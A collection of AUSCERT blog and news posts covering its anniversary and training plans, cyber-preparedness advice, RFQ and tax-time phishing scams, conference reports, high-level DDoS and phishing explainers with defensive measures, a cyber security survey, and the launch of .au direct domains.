AUSCERT is a world-renowned organisation that has been providing cybersecurity services and expertise to small and large businesses, universities and government agencies in Australia and neighbouring countries for almost three decades. Since its establishment in 1993, AUSCERT has built a reputation as a trusted advisor and a provider of critical incident response and security analysis services. In March this year, AUSCERT sheds its “young adulthood” status and will celebrate its thirtieth birthday! AUSCERT’s history is rooted in its mission to protect the digital assets of its members by providing practical and expert cybersecurity advice and support. Over the years, AUSCERT has responded to thousands of cyber incidents and worked tirelessly to develop and promote cybersecurity awareness, education, and best practices, both locally and internationally. Most importantly, AUSCERT is a not-for-profit organisation which exists only for its members, providing unique cybersecurity services which complement government and commercially available offerings. Based at The University of Queensland, AUSCERT works closely with UQ Cyber and global networks such as APCERT and FIRST, having built excellent relationships worldwide over nearly thirty years. AUSCERT funds the provision of its cybersecurity services from not-for-profit membership fees, reinvesting a small surplus into the development of its team members, with emphasis on continuous learning and improvement in culture. Generous sponsors allow AUSCERT to host the longest running cybersecurity conference in Australia each year since 2002. Known for its great atmosphere and opportunities to collaborate with peers in all industries, presentations and tutorials are sourced from the very best practitioners locally and worldwide. Members receive free or discounted attendance to excellent, low-cost professional learning and development in a welcoming environment. Registrations for the 2023 event open soon! In recent years, AUSCERT has expanded its services to include a range of cybersecurity training courses. With the growing demand for cybersecurity expertise, the AUSCERT Education program has become increasingly important, providing individuals and organisations with the skills and knowledge they need to stay ahead of the rapidly evolving cyber threat landscape. The AUSCERT Education program ranges from an introductory course for IT professionals who wish to learn the current terminology, practices and controls in cybersecurity to more advanced training such as cybersecurity risk management and forming an incident response plan. In recognition of the critical importance of areas such as board and executive cybersecurity awareness and data governance practices, during 2023 AUSCERT will expand its education programs into these areas. Together with this new direction in the AUSCERT Education program, other future services will include briefings for board members and executives, and implementation assistance for data governance practices. Overall, AUSCERT’s direction is to continue providing not-for-profit, high quality cybersecurity services and education for its members.

The 2032 Olympic Games (to be held in AUSCERT’s home city of Brisbane) are less than 10 years away. That may seem a long way off from the present time, but consider this: the recent global pandemic caused significant suffering and loss on a personal level, while disrupting 2, maybe 3 years of industrial progress worldwide with supply chain issues and the like. Natural disasters, which Australia seems to have more than its fair share of, also disrupt our lives personally and professionally.   We know preparedness is important for dealing with natural disasters and pandemics, but we still don’t always get it right. The well-established insurance and trade industries responsible for rebuilding houses is an example of this – I know of many families affected in Brisbane’s Feb 2022 floods who are still living in alternative accommodation, waiting on rebuilding efforts to even begin.  My point is, with cybersecurity a relatively new industry, now is the time to lay solid foundations for the future and “get it right” from the start. We don’t want to be looking back in a hundred years’ time in 2123 thinking “we’re still not getting it right”.   This may seem like a problem for senior management, although it’s our job as cyber security professionals to advise on these matters. Depending on the culture in your organisation this could be challenging, so why not reach out to other like-mind professionals in AUSCERT’s Member Slack to ask how they’ve been successful?   One suggestion is to talk about preparedness generally, rather than specifically about cyber. Help management understand that “cyber” isn’t just an “IT department thing” and speak about it as a normal business function. It’s just like completing your Business Activity Statement, running payroll, managing the lifecycle of your customers or any other function a business needs to do to retain relevance and solvency. Also, management should assume a cyber security incident WILL occur and keep that in mind when preparing. It’s possible risk assessments were calculated using “rare” or “unlikely” likelihood ratings to negate the “catastrophic” consequence, however as a professional you’ll be able to provide information about current events in cyber to make these assessments as accurate as possible. If you want some assistance keeping up with cyber security news, subscribe to AUSCERT’s ADIR for a daily digest.   In your briefings with management, talk about that crisis in the back of your mind – you know, the one that occasionally wakes you up in a sweat that you know would significantly impact lives (human or animal), livelihoods or the viability of your business. These days it’s usually ransomware, and because the actual risk is to the entire business we need to focus far wider than just the technical means by which ransomware is perpetrated, such as Lockbit or Royal.   In recent examples of both, the British Royal Mail were hit with Lockbit and QUT suffered a breach from Royal over the Christmas period. In both cases, the business impact was significant and ongoing. For example, courses and exams at QUT were suspended, and Royal Mail advised customers not to attempt to send letters and parcels overseas until the issue was resolved. Even more serious was the subsequent news that the Royal gang allegedly released the data stolen from QUT.   Whatever the crisis, you’ll need clarity on roles, responsibilities, and escalation protocols. This is far bigger than the IT department or the cyber security team. Your business will need to plan how internal and public communications are handled, have a war room, and manage handovers to prevent fatigue. If you don’t have a good plan already, why not lead a charge in your organisation to create one? Here’s a great template from the ACSC.   There are more considerations you may be called to advise upon, which are not traditionally “the IT dept’s problems”. You might need to help your organisation define a risk appetite. If we’re talking about ransoms, would your organisation pay a ransom? What legal and/or regulatory considerations are there? You might be in a situation in which lives depend upon payment of a ransom, and there’ve been rumours that cyber insurers may insist that you do pay the ransom to claim overall damages.   One of the best ways to draw out answers to these sorts of questions is to undertake a tabletop exercise. In these events you will bring together key decision makers from all parts of your business and simulate an actual crisis. There are plenty of consultants who’ll provide this as a paid service, and if you don’t know of any, reach out in AUSCERT’s Member Slack to ask your peers who they’d recommend. The ACSC’s Critical Infrastructure Uplift Program also provides tabletop exercises to certain industries, along with unique insights into national cyber security incidents they’ve responded to. At the very least you could run your own scenario using the ACSC’s Exercise in a Box, although sometimes bringing in outside advisors (particularly the Federal Government) does give your cyber preparedness plan extra credibility.   To help you with all of these concerns in 2023, we’ll continue providing our incident support and cyber threat intel for our members, and we’ll add additional training and awareness programs that aim to help with cyber-preparedness. We know that all of you are extremely busy with day-to-day activities, ever-increasing regulatory requirements and fighting cyber incidents. The new training courses will help you learn the very latest techniques in areas such as data governance, practical applications of cyber threat intelligence, and awareness of cybersecurity at the executive and board level. Hopefully you’ll all enjoy a prosperous, safe, happy and cyber-prepared 2023!   Mike Holm AUSCERT Senior Manager

RECENT TARGETS AUSCERT has been receiving reports of various RFQ scams spoofing Australian Universities and targeting vendors via the spoofed domain. THE TRIED AND TESTED METHOD A scammer creates an identical-looking domain impersonating a university. The spoofed domain with active MX records is then used to send emails to various vendors asking for quotes for the products they sell. The MX record allows email replies to be directed back to the scammer. The email address usually impersonates a staff member on the executive level. In some cases, the emails may be blocked or quarantined depending on the vendor’s security policy. Hence, small, and medium-sized companies are targeted as they might have a lower maturity level in their security policies. When such reports are sent to AUSCERT, it can be acted upon quickly if we are provided with email headers as evidence, and the domain registrar will usually suspend the domain successfully with such details. HOW IT HAS CHANGED Some scammers have now changed their methods of delivering such RFQ scams. To avoid the quarantine of emails and to avoid being taken down by the registrar (as the registrar usually requires email headers in such cases), scammers now use the built-in web forms located on the websites of small-medium-sized companies. The submitted email address is an address from the spoofed domain. In such cases, it is difficult for the targeted university to reach out to the companies asking for more information. Furthermore, since no email headers are recorded, submitting a takedown request to the domain registrar is difficult without much evidence. WHAT THE UNIVERSITY CAN DO Submit as much information as possible in such a situation. It is also recommended that the university should also reach out to the company that communicated with the scammer to obtain any related information. For e.g., the webform chat in this case. If the university is unable to contact the vendor, AUSCERT might be able to assist.

AUSCERT was delighted to sponsor the Best Security Student Award at the recent Women in Security Awards held in Sydney. Five outstanding finalists were in the running, each achieving success with their respective pursuits, with Elena Scifleet from CyberCX declared the winner! Congratulations to all the winners and everyone that contributed to such a successful and enjoyable event – we can’t wait for 2023! To see who else was recognised, visit the Women in Security Awards 2022 winners page. Members of the AUSCERT team were in attendance for the occasion with Analyst, Vishaka, providing a summary of her experience, below: It was a privilege to have been able to attend the Australian Women in Cyber Security Gala night 2022 along with my colleagues, on the evening of Wednesday, October 12. The event kicked off with a Cocktail networking hour. It was exciting to see so many familiar faces and meet new ones who are either pursuing their higher education in Cyber Security or just stepping into a career in Cyber Security. This year’s celebrations saw a staggering 826 nominations with 81 finalists, 19 winners, 17 Highly Commended and 2 Special Recognition recipients for 18 different award categories including Best Female Secure Coder, Protective Security Champion, IT Security Champion and Australia’s Most Outstanding Woman in IT Security. Kudos to AUSCERT’s former employee, Laura Jiew for taking the Best Volunteer award home! I felt absolutely honoured to witness the talented women who received awards for their accomplishments, value, and contributions to Cyber Security – most of them had a truly inspirational and motivational story to share! While celebrating women in Cyber Security, the event also acknowledged male counterparts in the field who have contributed to eliminating gender-based discrimination and bias in the workplace and promoting equality in the IT security industry. Dushyant Sattiraju and Dave O’Loan were recognised as Highly Commended in the Male Champion of Change category while Clive Rees bagged the award. Throughout the event, the importance and need of being a mentor for other women in the field were highlighted. Thank you to Abigail Swabey and her team for pulling off such a successful and fabulous event and thank you to the AUSCERT management for giving me an opportunity to participate in the event.

BSides Melbourne is a not-for-profit event that is wholly run by volunteers for the benefit of the community. It’s a community-driven conference that encourages and welcomes first-time speakers and students along with industry professionals, experienced and new alike! AUSCERT was delighted to sponsor the event, providing the tote bags for all attendees to fill with the array of goodies on offer. Some of the AUSCERT team ventured south to participate in the long-awaited (thanks to COVID delays) BSides Melbourne 2022. The following is an account of events from one of our Analysts, Vishaka. Day 1 The conference started with Joff Thyer’s keynote presentation that told of his inspirational journey in Information Security. He highlighted the key skills and qualities for a successful 21st-century career with my main takeaways from his speech being: If you make a mistake, do not walk away from it but take the owners of it and learn from it. Learn a programming language (he specifically mentioned Python) Afterwards, Mike Pritchard and Shanna Daly showcased how the craft of traditional espionage maps to the modern cyber world. Mike who is a passionate collector of historical espionage presented his extensive collection of spy gadgets – I found this to be super cool! I then made my way to a presentation about the data leak published on Twitter about the Conti ransomware gang that uses Ransomware as Service (RaaS). The presentation by Thomas Roccia, a Senior Security Researcher at Microsoft, highlighted how the leaked chat logs revealed private discussions between Conti members and how the data provided a unique insight into the inner workings of the group. I next ventured to Data, Demogorgons and the Upside-down world… and a Battleforce Angel by Tara Dharnikota which discussed data breaches and data thefts. Specifically, how it gets sold and distributed on darknet forums and marketplaces. Tara also emphasized the power of OSINT and how it can be used for the good. One of my favourites of the day was the talk by Jo, “How to (almost) get a DEFCON black badge”. She is the runner-up of The DefCon Social Engineering CTF (SECTF) competition and shared her experience at the 2019 SECTF in the battle for the DefCon Black badge. The last talker of the day was Emerald Sage who spoke about APT Catfishing and demonstrated how Open Source Intelligence tools and techniques can reconstruct the APT actor playbook for engineering and executing catfishing facilitated attacks. Day 2 Laura Bell kicked off the second day with a talk that demonstrated how proximity affects human behaviour, and how we as a cyber security community can embrace this knowledge to secure an entire country. My quest for knowledge and insight delivered me to “The Socio-Economic Impact of Women in Tech” by Kathy Robins. In this fascinating talk, she discussed the lack of female participation in the technical fields within the cyber security sector and STEM and how it creates a ripple effect throughout the development of technologies, systems and services.

The Asia Pacific Computer Emergency Response Team (APCERT) recently conducted its annual drill, a means of maintaining and improving awareness and skills within the cyber security community through this collaborative undertaking. The theme for 2022 was “Data Breach through Security Malpractice” which focused on realistic, real world cyber security risks and incidents that could potentially result. AUSCERT Analyst Narayan Neupane said, “This year’s drill was about tracing a ransomware activity and tracing the uploaded file’s location via provided evidence. The drill focused on packet capture, email analysis, forensic investigation, and incident response.” He continued, “Whilst some activities performed in the drill are carried out more than others in our daily work, it’s important and worthwhile to be tested in unexpected ways – it reflects what happens in the real world!”. The experiences and tasks conducted by each participating team allow for knowledge sharing with no single CERT typically experiencing the same issues or providing like-for-like services. The APCERT drill aims to maintain and progress internet security and safety with the exercise providing participants with the chance to improve communication protocols, technical responses, and the overall quality of incident responses. “This year’s drill was tough but also, fun and there was a feeling of satisfaction once we were able to finish the drill successfully”, Narayan concluded. This year, 25 CSIRTs from 21 economies took part in the drill and although undertaken in a few hours, the lessons learned from the experience can provide benefits long after. As each drill typically requires six to eight months of planning and preparation, the 2023 APCERT Cyber Drill will soon be underway – the ongoing need for education and skill enhancement reflects the rapid development of the digital world we reside in and the threats we all face.

What is distributed denial of service (DDoS) & How Does it Work? The AUSCERT team provides proactive and reactive incident response assistance actively seeking information from various sources to help find data relevant to a client. We take immediate action and follow well-defined protocols in order to obtain a resolution and satisfactory outcome. This article is aimed at those who need a high level explanation of what a DDoS attack is. DDoS Attacks In 2022 Already in 2022 the IT industry has experienced a large increase of distributed denial of service (DDoS) attacks. Not that long ago, most DDoS attacks were seen as minor nuisances perpetrated by harmless novices who did it for fun, back then DDoS attacks were relatively easy to mitigate.   DDoS attacks are becoming an extremely sophisticated activity, and in many cases, big business. According to TechRepublic, in the first quarter of 2022, Kaspersky DDoS Intelligence systems detected 91,052 DDoS attacks. 44.34% of attacks were directed at targets located in the USA, which comprised 45.02% of all targets.   Exactly What Is a DDoS Attack? Despite DDoS attacks becoming ever more common, they can be quite sophisticated and difficult to combat. But what exactly is a DDoS attack and what does DDoS stand for? DDoS is the anagram for Distributed Denial of Service. A DDoS attack occurs when a threat actor uses resources from multiple, remote locations to attack an organisation’s online operations. The goal is to consume resources so that legitimate access to services is not possible, for example, a website or online service will appear to be ‘down’ for people attempting to use it. DDoS attacks usually focus on generating a huge amount of network traffic that overwhelm operations of network equipment and services such as routers, domain name services or web caching. How Long Can DDoS Attacks Last For? The short answer – there is no set duration. DDoS attacks vary extensively in both duration and sophistication: Long-Term Attack: An attack waged over a period of hours or days is referred to as a long-term attack. For example, the largest recorded DDoS attack was against Amazon Web Services (AWS), this caused disruption for three days before finally being finally mitigated. Burst Attack: Also known as pulse-wave attacks, as the name implies they are waged over a very short period of time, lasting from a few seconds to a few minutes and occurring in frequent bursts. Again, time is not really a factor; the quicker, burst attacks can also be as damaging as the long-term attacks.   How to Protect Your Organisation Against DDoS Attacks Some measures that organisations can take to protect themselves against DDoS attacks are: Reduce the attack surface of Internet-visible services to only that which is required. For example, inbound ICMP packets are unlikely to be needed and should be blocked. Use a Content Delivery Network (CDN). Implement server-level DDoS mitigation measures, making use of best practice guides from application and operating system software providers. Plan for disruption including alternative ways of providing services to clients. Short term increases in network or server capacity may be a solution, depending on the costs. Knowing these in advance will inform business continuity planning discussions. Implementing monitoring systems to detect large increases in outbound network traffic to avoid becoming part of the problem and the cause of reputational damage. Phishing Take-down service AUSCERT’s Phishing Take-down service works to reduce brand damage by requesting the removal of fraudulent websites. The service puts the safety of your brand at the forefront by detecting and acting immediately if your organisation is affected. To find out more about this service click here.

What is Phishing? Phishing is an attack whereby the attacker impersonates a reputable entity or person in email or other forms of communication, such as SMS or instant messaging. Most commonly attackers will use phishing emails to distribute malicious links or attachments that can perform a variety of malicious functions. Phishing Attacks A phishing attack can have devastating results. For individuals, this includes unauthorised purchases, electronic theft of money, or identity theft. Phishing attacks can often be used to gain a foothold into an organisation’s network, as a part of a larger attack, such as ransomware or Business Email Compromise. This happens when employees are compromised in order to bypass security controls and distribute malware or fraudulent messaging inside the victim organisation. A successful attack on an organisation can have severe implications such as financial losses and extended outages, in addition to a reduction of market share, damaged reputation, and loss of customer trust. Types Of Phishing Attacks Email Phishing Scams In the most common version of email-based phishing, the attacker sends out thousands of fraudulent messages with the intent of gathering personal information, account credentials or for financial gain. This type of attack is very much a numbers game, even if 1% of several thousand recipients fall for the scam, then the attack can be considered successful. As with legitimate marketing campaigns, to improve success rates fraudsters will also take the time and effort to maximise their effort by trialling different messaging and tactics and studying their relative success rates.  They will clone emails from a spoofed organisation, by using the same phrasing, typefaces, logos, and signatures to make the messages appear legitimate. Additionally, attackers will commonly try to push users into action by creating a sense of urgency. For example, an email could threaten account expiration and place the recipient on a deadline. By applying a time-sensitive cue, users are more likely to act sooner rather than later, without much thought. These scams can be hard to spot, typically having a misspelt website address or extra subdomain, so for example www.commbank.com.au/login could be www.combank.com.au/login. The similarities between the two website addresses give the impression of a legitimate link, making it more difficult to discover an attack is taking place. Spear Phishing This is a more precisely focused attack as spear phishing targets a specific person or organisation, as opposed to thousands of people as described above. It’s a more specific type of phishing that often incorporates special knowledge about an organisation, such as its staff members’ names and titles, organisational structure and clients. A common spear phishing attack scenario is where the attackers will research names of employees within an organisation’s marketing department in order to gain access to the latest project invoices. Posing as a marketing director, the attacker emails a departmental project manager (PM) using a subject line that reads something like: “Updated invoice for Q3 campaigns”. This email will be a clone of the organisation’s standard email template. A link in the email redirects to a password-protected internal document, which is simply a spoofed version of a stolen invoice. The PM is requested to log in to view the document. The attacker steals the login credentials, gaining full access to sensitive areas within the organisation’s network. By providing an attacker with valid login credentials, spear phishing is an effective method for executing the first stage of further attacks, such as ransomware or Business Email Compromise. How To Prevent Phishing To protect against phishing attacks some steps should be taken by both employees and enterprises. For employees, simple vigilance is vital. A spoofed message will almost always contain subtle differences that expose their fraudulent purpose. These frequently include spelling errors such as website names. Users should also stop and think about why they’re even receiving the email and if it seems unusual or out of character for the alleged sender. At an enterprise level, a number of steps can be taken to mitigate both phishing and spear phishing attacks: Two-factor authentication (2FA) is the most effective method for countering phishing attacks, as it adds an extra verification layer when logging in to applications. 2FA relies on users having two things: something they know, such as a password and username, and something they have, such as a mobile phone running an authentication app. Organisations should enforce a strict password management policy that takes into account how people actually behave. For example, staff should be required to use passwords that are difficult for an attacker to guess but not so complex they can’t be remembered by people. Passphrases are often a better strategy than complex passwords. Password managers combine convenience and strong passwords and their use should be encouraged. Staff should be educated not to reuse the same password for multiple accounts, as this makes password spraying attacks much easier. Empowering employees through engaging and informative cyber security awareness training will help reduce the threat of most cyber security attacks, including phishing. Enable SPF and DMARC to make it more difficult for attackers to send email faking an organisation’s identity. Early Warning SMS Early warning notifications assist in managing critical security threats to your network. AUSCERT monitors malicious activity online and the Early Warning Service provides SMS notifications of any immediate and serious threats relevant to your industry. To find out more about this service click here.

As one financial year ends and another begins, Australians start preparing their tax applications and with it, an increase in the frequency and scope of tax-related phishing is expected. We are going to look at various methods a scammer/attacker might use to obtain your personal information such as username, password, credit card details, contact details or any other information that identifies you as you. This personal information is then used fraudulently or to conduct further malicious activities depending on the data obtained.   Email phishing Email phishing is one of the most common methods used to obtain your personal information. The sender imitates the Australian Tax Office (ATO) or MyGov and sends a phishing email that looks like a legitimate email. The spoofed email address may be difficult to detect when the recipient is using a phone as typically, it does not show the actual email address in full, revealing who it was sent from. a. Email with a Phishing URL Usually, such emails contain a phishing link that when clicked, redirects the user to a website asking for personal information. Emails that request the recipient to enter their details, such as bank account information, could lead to fraud. Example of malicious email with a phishing URL   b. Email with a local HTML attachment Some emails will not contain any phishing URLs within the body of the email. Instead, the email will have an HTML file as an attachment. When a user opens the HTML attachment, it will link to a phishing form requesting the user enter a username and password. The HTML file contains code that sends the credentials to the attacker (if entered). Such techniques are used to avoid email security software. Example of malicious email with an HTML attachment Example of malicious email with an HTML phishing form   Smishing (SMS Phishing) As consumers become more aware of potential threats and scams, attackers develop new methods to target and trick recipients. One such method is smishing. This method is quite simple as the fake texts are disguised to come from a known and trusted source such as a bank or, the ATO. In this instance, a text message with a URL is sent to a phone number pretending to be MyGov. When clicked, the user is redirected to a MyGov phishing page where they are required to enter personal information. Additionally, it could then redirect the user to a secondary phishing page made to look like a bank. Example of malicious phishing link in SMS/Text Message (1) Example of malicious phishing link in SMS/Text Message (2) Example of phishing page (MyGov) Example of phishing page redirecting to secondary phishing page (MyGov to a bank)   It is important to know that ATO or MyGov would not send any email or text message directly to ask for any personal information. Should you receive a suspicious email or SMS, please report it to ReportEmailFraud@ato.gov.au or contact ATO. If something looks suspicious, be it the spelling, website address or the request within the message, do not click the link or proceed! ATO is a member of AUSCERT and we help ATO in deactivating such phishing websites. AUSCERT members have access to the Malicious URL Feed which is automatically populated with malware and phishing links as AUSCERT’s Analyst Team processes them and is updated every 15 minutes. Additional indicators (over and above the malicious URLs) such as email content, and phish page screen captures, can be found in AUSCERT’s Member Security Incident Notifications (MISP). Further information on the mentioned services can be found at the links below: AUSCERT Malicious URL Feed AUSCERT MISP

BDO and AUSCERT say the federal government’s technology investment boost is a good first step to heighten the resilience of Australian businesses. However, there is a need for business guidance to avoid another ‘pink batts’ fiasco. The emergence of questionable ‘pop-up’ providers is a reality, say the industry experts. On 29 March 2022, as part of the 2022–23 Budget, the Australian Government announced it will support small business via the Small Business Technology Investment Boost and Small Business Skills and Training Boost. Small businesses with annual turnover of less than $50 million will be able to deduct 120% of eligible training and assets, such as cyber security systems or subscriptions to cloud-based services, in their 2022–23 tax return. AUSCERT and BDO are calling for guidance to be provided for SME’s looking to take advantage of the government incentives to mitigate the chance of inadequate governance. “AUSCERT recognises the significance of the latest federal government announcement and hope the promise will be matched equally by delivery,” said AUSCERT Director David Stockdale. “While it is easy for a government in the runup to an election to make promises, the true benefit is in recognising the needs of SME’s and then delivering the training that will lift the cyber security posture of these organisations. This is a huge task, and with additional pressures on the already stretched Australian Cyber Security Centre to be actively involved with additional critical infrastructure requirements amongst other things, it will fall to the private sector to fill the gap.” “Helping SMEs to understand the threats, assess their own risk landscape and implement proportional controls is critical, and is no easy task. Risk management and cybercrime awareness aren’t the core business of most SMEs, and history has shown that even large corporates can fall victim to wide scale breaches if inadequate governance is in place over contractors such as managed Cyber Security Operations Centres,” noted David. “Training, and regulation of the training, needs to address these knowledge gaps – let’s hope we do not see providers pedalling a “silver bullet” course and we find ourselves looking back and see another ‘pink batts’ fiasco.” The latest BDO and AUSCERT Cyber Security Survey found incidents requiring data recovery efforts also rose by 160% from 2020, suggesting that cyber attacks are becoming more destructive and laser focused. BDO Partner and National Cyber Security Leader Leon Fouche said, “The technology investment boost is a great first step to heighten the resilience of Australian businesses. However, the government announcements to help drive training creates a ripe environment for ineffective training and providers to pop up.” The BDO and AUSCERT survey found that 2021 saw a staggering 175% increase for data breaches caused by accidental emails, such as ‘CC’ing’ instead of ‘BCC’ing’, indicating that staff security awareness training may not be as robust as needed in the wake of remote working arrangements “With the steady increase in working remotely driven by the pandemic there is growing awareness of the need for training,” said Leon. “Indeed, our report showed that 1 in 4 organisations have invested in some form cyber awareness training. Yet most organisations don’t have a chief security officer, or specialist security contractor on speed dial to keep up with the rapidly changing landscape of cyber threats, so the government will need to be able to provide SME’s with a starting point and ongoing support to really help these incentives be impactful.” The BDO and AUSCERT Cyber Security Survey found that 60% of organisations use some form of cyber threat intelligence, meaning those who are not continually learning about new cyber threats are lagging behind their peers. The survey identified several steps business can take to significantly lessen cyber incidents, including onboarding Security Operations Centres, implementing Cyber Awareness Training, undertaking Supply Chain Risk Assessments, and creating Cyber Incident Response Plans. “No doubt the incentives announced by the government will drive SMEs signing on to training and purchasing assets,” commented Leon. “Whether this means a business’s first training course for their staff or upskilling of those employees who already have some awareness training. What is key is guidance on how business can best invest so their efforts are most effective, including avoiding investment in poor training or assets.” BDO forensic expert Stan Gallo said, “Rather than just handing money to the SME owners and leaving them to it, an alternative approach might be to first guide them to where they can discuss the possibilities and get advice on technology investment that can take their business to the next level. There is a lot more to digital evolution than a flashy website or a cloud subscription and throwing money at SME business. Stan noted that the Technology Investment Boost will be a great opportunity to enhance cybersecurity, but hardly revolutionary. “The Technology Investment Boost is terrific for innovative tech driven start-ups and entrepreneurial business, but mature SME’s looking to grow still need to understand the basics of how technology can enhance their business, in addition to standard backend operations. Many people that have laboured over the years and built up a successful business, particularly in traditionally non technology driven areas, still need assistance to understand technology investment and how it can add value to their business operations.” “There is an increased risk the money will be spent on standard IT support and lacklustre training provided by questionable ‘pop-up’ providers,” cautioned Stan. “The types of threats we are seeing continue to evolve in line with current events and technologies, but at their core, there remain many similarities. Phishing, ransomware encryption, business email compromise and data theft are still ever present,” noted Stan. “However, there has been some insidious countermovement. For example, on the back of a growing trend of heightened preparedness and recoverability, thereby denying ransom payments, the ‘standard’ ransomware attack is now regularly linked to an initial theft of data to provide two bites at the cherry. If the victim is not going to pay the ransom – then maybe, they will pay to get their confidential data back. As usual there are no guarantees either way.” You can view a copy of the BDO and AUSCERT Cyber Security Survey at the following link: Cyber Survey Report 2021

From 24 March 2022, the Australian Domain Administration (auDA) will be introducing a new option for Australian internet users with the availability of .au direct domain names. The shorter and simpler domain names (such as pavlova.au, station.au and so on) will be open to individuals and organisations that wish to have an online presence, new or existing, with the proviso that they have a verified connection to Australia. Whilst offering convenience for businesses and individuals, it also presents an opportunity for cybercriminals to create malicious domains. At AUSCERT, it’s our purpose to understand just what those threats might be to provide our members with an analysis of the situation. While it is impossible to completely prevent all kinds of domain name abuse, the requirements auDA has in place (such as registrants needing to have an ‘Australian presence’) certainly help mitigate against widespread and easy abuse (as is prevalent in many other jurisdictions). auDA has extensive resources available should you wish to learn more, including detailed information regarding registering domain names in .au direct, timelines, domain conflict resolution and so on. In addition, you can contact your preferred domain retailer. However, in brief, some points of note are: auDA continues with its strict rules against .au domains being used in any malicious or illegal activities and will take action against recognised offenders. auDA will provide priority registration to those organisations with existing registered domains to the same name in ‘.au’. For example, here at AUSCERT, we have ‘auscert.org.au’ which gives us priority to register and use ‘auscert.au’. This priority period is for six months from the launch date (24 March 2022) to register the ‘.au’ domain after which, it becomes available to anyone. Essentially, this means you have until 20 September 2022 to register any existing domain names you wish to have the new ‘.au’ version of. An “Australian presence” will be required to register a .au direct domain and essentially requires one of: An ABN A Trademark number Australian identification document (passport, driver’s license, etc.) So, what does this mean for you? Be aware that the .au direct domains are being launched on 24 March 2022. Consider which of your existing domains you may wish to register in .au direct. We encourage all members wishing to undertake this process, to do so within six months to avoid any potential issues arising later. Determine whether there may be any potential conflicts with other domain name registrants and understand the auDA process for resolving the conflicts. Check the auDA website for complete details. Contact your preferred domain retailer to register your new domains. Consider which new (rather than existing) domain names you may wish to register. Be aware that the opening up of a new domain space always provides a potential for the resurgence of domain abuse (such as domain squatting, phishing, etc) and take pre-emptive measures such as domain registration in the new domain space. Please contact the team at AUSCERT if you have any security-related questions relating to the introduction of .au direct domains you believe we can assist with. All other questions concerning, for example, domain registration, conflict resolution and so on are best dealt with by reviewing auDA’s or your retailer’s .au direct resources.